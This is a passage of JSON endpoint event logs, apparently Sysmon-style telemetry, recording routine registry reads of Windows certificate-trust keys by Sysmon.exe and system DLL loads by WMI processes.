"timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481830000, 
- "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msscntrs.dll", - "image_path": "C:\\Windows\\System32\\msscntrs.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479950016, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", 
- "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "perfdisk.dll", - "image_path": "C:\\Windows\\System32\\perfdisk.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479950016, 
- "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481980000, - 
"unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": 